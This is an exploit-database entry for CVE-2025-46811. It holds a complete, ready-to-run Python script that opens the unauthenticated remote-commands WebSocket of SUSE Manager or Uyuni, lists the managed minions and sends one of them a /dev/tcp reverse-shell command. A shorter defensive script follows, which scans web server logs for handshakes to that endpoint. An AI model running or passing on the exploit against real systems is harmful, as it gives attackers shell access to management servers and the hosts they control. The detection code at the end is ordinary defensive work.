SUSE Manager 4.3.15 Code Execution
Wiktor Maj · 2026-05-23 · via CXSECURITY Database RSS Feed - CXSecurity.com

# Exploit Title: SUSE Manager 4.3.15 - Code Execution
# Date: 29.01.2026
# Exploit Author: Wiktor Maj
# Vendor Homepage: https://www.uyuni-project.org/
# Software Link: https://github.com/uyuni-project/uyuni
# Version: Uyuni 2025.05, SUSE Manager 5.0.4, SUSE Manager 4.3.15
# Tested on: Debian 12 (bookworm), Python 3.11.2 with websocket-client 1.9.0
# CVE: CVE-2025-46811

# Sends a reverse shell payload to the vulnerable WebSocket of SUSE Manager or Uyuni.
# Set up a listener session in a separate terminal.
# After the payload is sent, switch to your listener terminal to check whether a shell has popped.
# Example:
# python3 cve-2025-46811.py --ip 192.168.10.126 --port 443 --host-ip 192.168.10.113 --host-port 9001 --ssl

#### Program constants ####
PAYLOAD = "sh -i >& /dev/tcp/HOST_IP/HOST_PORT 0>&1"  # Reverse shell payload; HOST_IP and HOST_PORT are replaced with the command-line arguments
CONNECTION_RETRIES = 4  # Number of connection attempts
CONNECTION_DELAY_BETWEEN_RETRIES = 15  # Seconds
WEBSOCKET_TIMEOUT = 10  # Seconds
##############################

import argparse
import json
import socket
import ssl
import sys
import time

import websocket


def parse_args() -> argparse.Namespace:
    parser = argparse.ArgumentParser(
        description="CVE-2025-46811 exploit implementation for SUSE Manager and Uyuni.",
        add_help=False,
    )
    parser.add_argument("-h", "--help", action="help", default=argparse.SUPPRESS, help="Show this help text and exit.")
    parser.add_argument("--ip", required=True, help="Victim IPv4 or hostname.")
    parser.add_argument("--port", type=int, default=443, help="Victim port (default: 443).")
    parser.add_argument("--host-ip", required=True, help="Attacker host IPv4 or hostname.")
    parser.add_argument("--host-port", type=int, required=True, help="Attacker host port.")
    group = parser.add_mutually_exclusive_group()
    group.add_argument("--ssl", dest="ssl", action="store_true", help="Use SSL/TLS for the WebSocket connection (default).")
    group.add_argument("--no-ssl", dest="ssl", action="store_false", help="Disable SSL/TLS and use a plaintext WebSocket.")
    parser.set_defaults(ssl=True)
    return parser.parse_args()


def resolve_target(hostname: str) -> str:
    return socket.gethostbyname(hostname)


def receive_preview_minions_message(websocket_connection: websocket.WebSocket) -> str:
    while True:
        try:
            message = websocket_connection.recv()
            if message:
                print("Received:", message)
                if isinstance(message, bytes):
                    message = message.decode("utf-8", errors="replace")
                return message
        except websocket.WebSocketTimeoutException as exception:
            raise RuntimeError("Failed to receive preview minions message") from exception


def decode_preview_minions_message(message: str) -> list[str]:
    try:
        preview_output = json.loads(message)
    except json.JSONDecodeError as exception:
        raise RuntimeError("Preview response is not valid JSON") from exception
    if (
        isinstance(preview_output, dict)
        and isinstance(preview_output.get("minions"), list)
        and preview_output["minions"]
        and all(isinstance(entity, str) for entity in preview_output["minions"])
    ):
        return preview_output["minions"]
    raise RuntimeError("Preview response expected a non-empty 'minions' list")


def receive_preview_minions(websocket_connection: websocket.WebSocket) -> list[str]:
    message = receive_preview_minions_message(websocket_connection)
    minions = decode_preview_minions_message(message)
    return minions


def select_minion(minions: list[str]) -> str:
    print("Available minions:")
    for minion_id, minion_name in enumerate(minions, start=1):
        print(f"{minion_id}) {minion_name}")
    prompt = "Select minion number (default is '1', or 'c' to cancel): "
    while True:
        selection = input(prompt).strip()
        if selection == "":
            return minions[0]
        if selection.lower() == "c":
            print("No minion selected. Exiting.")
            sys.exit(0)
        if selection.isdigit():
            index = int(selection)
            if 1 <= index <= len(minions):
                return minions[index - 1]
        print("Invalid selection.")


def connect_to_websocket(
    target_ip: str,
    port: int,
    use_ssl: bool,
    sslopt: dict,
) -> websocket.WebSocket:
    scheme = "wss" if use_ssl else "ws"
    try:
        return websocket.create_connection(
            f"{scheme}://{target_ip}:{port}/rhn/websocket/minion/remote-commands",
            timeout=WEBSOCKET_TIMEOUT,
            sslopt=sslopt,
        )
    except ssl.SSLError as exception:
        if "WRONG_VERSION_NUMBER" in str(exception):
            raise RuntimeError("Websocket appears to be unencrypted, try --no-ssl") from exception
        raise
    except websocket.WebSocketBadStatusException as exception:
        if exception.status_code == 400:
            raise RuntimeError("Websocket appears to be encrypted, try --ssl") from exception
        raise
    except TimeoutError as exception:
        raise RuntimeError("Websocket may be restricted by a firewall") from exception


def get_minions(
    target_ip: str,
    port: int,
    use_ssl: bool,
) -> tuple[websocket.WebSocket, list[str]]:
    sslopt = {"cert_reqs": ssl.CERT_NONE, "check_hostname": False}
    for attempt in range(1, CONNECTION_RETRIES + 1):
        websocket_connection = None
        try:
            websocket_connection = connect_to_websocket(target_ip, port, use_ssl, sslopt)
            websocket_connection.send(json.dumps({"preview": True, "target": "*"}))
            minions = receive_preview_minions(websocket_connection)
            return websocket_connection, minions
        except (
            websocket.WebSocketTimeoutException,
            websocket.WebSocketConnectionClosedException,
        ):
            if websocket_connection is not None:
                websocket_connection.close()
            if attempt == CONNECTION_RETRIES:
                break
            time.sleep(CONNECTION_DELAY_BETWEEN_RETRIES)
    raise RuntimeError("Target websocket is not vulnerable or is unreachable")


def send_payload(websocket_connection: websocket.WebSocket, target: str) -> None:
    payload = PAYLOAD.replace("HOST_IP", args.host_ip).replace("HOST_PORT", str(args.host_port))
    websocket_connection.send(json.dumps({"preview": False, "target": target, "command": payload}))


if __name__ == "__main__":
    args = parse_args()
    websocket_connection = None
    try:
        websocket_connection, minions = get_minions(
            target_ip=resolve_target(args.ip),
            port=args.port,
            use_ssl=args.ssl,
        )
        selected_minion = select_minion(minions)
        send_payload(websocket_connection, selected_minion)
        print("Payload sent, closing.")
    finally:
        if websocket_connection is not None:
            websocket_connection.close()
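
For defenders, the script's first step is a WebSocket handshake on `/rhn/websocket/minion/remote-commands`, which is recorded in the front-end web server's access log. The following is an added example, not part of the original exploit or of the Uyuni project: it lists requests to that endpoint that come from outside administrator networks. It assumes Apache combined-format log lines and a hypothetical `ADMIN_NETS` allowlist; the sample lines are constructed.

```python
import ipaddress
import re

# Endpoint path taken from connect_to_websocket() in the script above.
ENDPOINT = "/rhn/websocket/minion/remote-commands"
# Assumption: the front-end web server writes Apache "combined" format lines.
LOG_RE = re.compile(
    r'^(?P<src>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) '
)
# Assumption (hypothetical allowlist): networks administrators use for the web UI.
ADMIN_NETS = ["10.20.0.0/24"]


def suspicious_handshakes(lines, admin_nets=ADMIN_NETS):
    """Return (timestamp, source, status) for every request to the
    remote-commands WebSocket whose source is outside admin_nets."""
    nets = [ipaddress.ip_network(n) for n in admin_nets]
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m or m["path"].split("?", 1)[0].rstrip("/") != ENDPOINT:
            continue
        try:
            src = ipaddress.ip_address(m["src"])
            outside = not any(src in net for net in nets)
        except ValueError:
            outside = True  # hostname logged instead of an address: report it
        if outside:
            hits.append((m["ts"], m["src"], int(m["status"])))
    return hits


# Constructed sample lines (documentation address ranges), not real traffic.
SAMPLE_LOG = [
    '10.20.0.15 - - [29/Jan/2026:10:01:02 +0000] "GET /rhn/websocket/minion/remote-commands HTTP/1.1" 101 - "-" "Mozilla/5.0"',
    '198.51.100.7 - - [29/Jan/2026:10:05:40 +0000] "GET / HTTP/1.1" 200 5120 "-" "-"',
    '198.51.100.7 - - [29/Jan/2026:10:05:41 +0000] "GET /rhn/websocket/minion/remote-commands HTTP/1.1" 101 - "-" "-"',
    '203.0.113.9 - - [29/Jan/2026:10:09:13 +0000] "GET /rhn/websocket/minion/remote-commands HTTP/1.1" 403 199 "-" "-"',
]

if __name__ == "__main__":
    for ts, src, status in suspicious_handshakes(SAMPLE_LOG):
        note = "handshake accepted" if status == 101 else "not upgraded"
        print(f"{ts} {src} status={status} ({note})")
```

A status of 101 means the server completed the WebSocket upgrade for that source; other statuses still indicate that the endpoint was probed.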